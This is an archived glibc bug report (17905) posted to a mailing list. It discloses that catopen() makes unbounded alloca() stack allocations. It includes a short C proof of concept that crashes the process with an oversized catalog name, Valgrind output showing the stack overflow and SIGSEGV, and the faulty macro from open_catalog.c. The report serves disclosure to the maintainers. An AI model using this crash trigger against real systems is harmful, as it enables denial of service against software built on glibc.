This is the mail archive of the glibc-bugs@sourceware.org mailing list for the glibc project.


Index Nav: [Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav: [Date Prev] [Date Next] [Thread Prev] [Thread Next]
Other format: [Raw text]

[Bug libc/17905] New: catopen() Multiple unbounded stack allocations


https://sourceware.org/bugzilla/show_bug.cgi?id=17905

            Bug ID: 17905
           Summary: catopen() Multiple unbounded stack allocations
           Product: glibc
           Version: 2.20
            Status: NEW
          Severity: normal
          Priority: P2
         Component: libc
          Assignee: unassigned at sourceware dot org
          Reporter: max at cxib dot net
                CC: drepper.fsp at gmail dot com

Reference: 
https://sourceware.org/bugzilla/show_bug.cgi?id=17897

PoC:

#include <nl_types.h>
#include <string.h>
#include <stdlib.h>

int main(){

        char *buff;
        buff=malloc(11111111);
        memset(buff,'A',11111110);
        buff[11111110]='\0';

        catopen(buff, NL_CAT_LOCALE);

        return 0;
}



========================

==25788== Memcheck, a memory error detector
==25788== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==25788== Using Valgrind-3.10.0.SVN and LibVEX; rerun with -h for copyright
info
==25788== Command: ./cato
==25788== 
==25788== Warning: client switching stacks?  SP change: 0xfff000330 -->
0xffe567648
==25788==          to suppress, use: --max-stackframe=11111656 or greater
==25788== Invalid write of size 8
==25788==    at 0x4E6CD5A: __open_catalog (open_catalog.c:102)
==25788==    by 0x4E6C38E: catopen (catgets.c:71)
==25788==    by 0x400616: main (in /home/kalibaba/cato)
==25788==  Address 0xffe567648 is on thread 1's stack
==25788== 
==25788== 
==25788== Process terminating with default action of signal 11 (SIGSEGV)
==25788==  Access not within mapped region at address 0xFFE567648
==25788==    at 0x4E6CD5A: __open_catalog (open_catalog.c:102)
==25788==  If you believe this happened as a result of a stack
==25788==  overflow in your program's main thread (unlikely but
==25788==  possible), you can try to increase the size of the
==25788==  main thread stack using the --main-stacksize= flag.
==25788==  The main thread stack size used in this run was 8388608.


========================

open_catalog.c

#define ENOUGH(n)                                  \
  if (__builtin_expect (bufact + (n) >= bufmax, 0))                  \
    {                                          \
      char *old_buf = buf;                              \
      bufmax += 256 + (n);                              \
      buf = (char *) alloca (bufmax);                          \
<===============
      memcpy (buf, old_buf, bufact);                          \
    }


and others alloca() in catopen()

-- 
You are receiving this mail because:
You are on the CC list for the bug.


Index Nav: [Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav: [Date Prev] [Date Next] [Thread Prev] [Thread Next]